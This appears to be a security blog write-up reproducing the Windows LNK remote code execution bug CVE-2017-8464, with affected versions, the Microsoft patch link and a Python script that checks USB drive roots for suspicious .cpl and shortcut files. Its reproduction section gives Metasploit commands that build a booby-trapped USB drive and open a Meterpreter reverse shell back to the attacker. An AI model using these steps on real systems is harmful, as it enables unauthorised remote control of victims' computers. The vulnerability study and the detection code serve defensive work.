
Stuxnet repeat (CVE-2017-8464)

0x01 Overview

In June 2017, Microsoft released a patch for CVE-2017-8464. The bug allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. It is also known as the “LNK Remote Code Execution Vulnerability”.
It is like Stuxnet, so some people call it the third generation of Stuxnet. In this article, I will reproduce CVE-2017-8464.

0x02 Affected versions

Windows 7 SP1
Windows 8
Windows 8.1
Windows RT 8.1
Windows 10 Gold, 1511, 1607, 1703
Windows Server 2008 SP2 and R2 SP1
Windows Server 2012 Gold and R2
Windows Server 2016

0x03 Trigger conditions

1. AutoPlay is enabled (It worked!)
2. Browsing the directory (It worked!)
3. Accessing the file directory through a network share (I did not test this)

0x04 Reproducing the bug

Environment:
Target: Win7 (32-bit)
Attacker: Kali
Tools: MSF, USB drive
Step 1:
Download the latest Metasploit, then copy modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb to /usr/share/metasploit-framework/modules/exploits/windows/fileformat.
Also copy data/exploits/cve-2017-8464 to /usr/share/metasploit-framework/data/exploits.
Step 2:
msfconsole
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your ip
exploit
Step 3:
cp -r /root/.msf4/local/ /root/cve-2017-8464-lnk
Step 4:
Copy all 24 files to the root folder of the target USB drive.
Step 5:
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your ip
run
Step 6:
Insert the USB drive into the target computer, and you will get a reverse shell.

PS: the .cpl file must be in the root folder of the target USB drive!

0x05 Repair

Get the patch from MS:
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8464
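
For machines that cannot be patched right away, a removable drive can be triaged before it is opened in Explorer. The script below is an added example, not code from this article or from Metasploit: it flags a drive root that holds both a .cpl file and shortcuts whose target ID list names a .cpl, the layout described in the PS note above. The function names and the sample files are assumptions constructed for illustration; the header constants come from the public MS-SHLLINK specification.

```python
import struct
import tempfile
from pathlib import Path

# Shell Link header constants from the public MS-SHLLINK format specification.
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x1

def lnk_id_list(data):
    """Return the raw LinkTargetIDList bytes, b"" if absent, None if not a .LNK."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data)[0] != HEADER_SIZE:
        return None
    if data[4:20] != LINK_CLSID:
        return None
    flags = struct.unpack_from("<I", data, 20)[0]
    if not flags & HAS_LINK_TARGET_ID_LIST or len(data) < HEADER_SIZE + 2:
        return b""
    size = struct.unpack_from("<H", data, HEADER_SIZE)[0]
    return data[HEADER_SIZE + 2:HEADER_SIZE + 2 + size]

def references_cpl(id_list):
    """Heuristic: the ID list names a .cpl target (ASCII or UTF-16LE)."""
    lowered = id_list.lower()
    return b".cpl" in lowered or ".cpl".encode("utf-16-le") in lowered

def scan_drive_root(root):
    """List .cpl files in the root and shortcuts there whose ID list names a .cpl."""
    files = [p for p in Path(root).iterdir() if p.is_file()]
    cpls = sorted(p.name for p in files if p.suffix.lower() == ".cpl")
    lnks = sorted(p.name for p in files if p.suffix.lower() == ".lnk"
                  and references_cpl(lnk_id_list(p.read_bytes()) or b""))
    return {"cpl_files": cpls, "lnk_to_cpl": lnks, "suspicious": bool(cpls and lnks)}

def make_sample_lnk(target):
    """Constructed test input: minimal header plus one ID-list item naming `target`."""
    item = target.encode("utf-16-le")
    id_list = struct.pack("<H", len(item) + 2) + item + b"\x00\x00"
    header = struct.pack("<I", HEADER_SIZE) + LINK_CLSID + struct.pack("<I", 1)
    return header.ljust(HEADER_SIZE, b"\x00") + struct.pack("<H", len(id_list)) + id_list

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:  # stands in for a mounted USB root
        Path(root, "a.lnk").write_bytes(make_sample_lnk("E:\\sample.cpl"))
        Path(root, "b.lnk").write_bytes(make_sample_lnk("E:\\notes.txt"))
        Path(root, "sample.cpl").write_bytes(b"placeholder")
        print(scan_drive_root(root))
```

Legitimate Control Panel shortcuts also reference .cpl files, so a hit is a reason to inspect the drive on an isolated, patched system rather than proof of an exploit.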

0x06 Conclusion

I think this bug is so cool; it is like Stuxnet, powerful and easy to use, so get the patch as fast as possible.
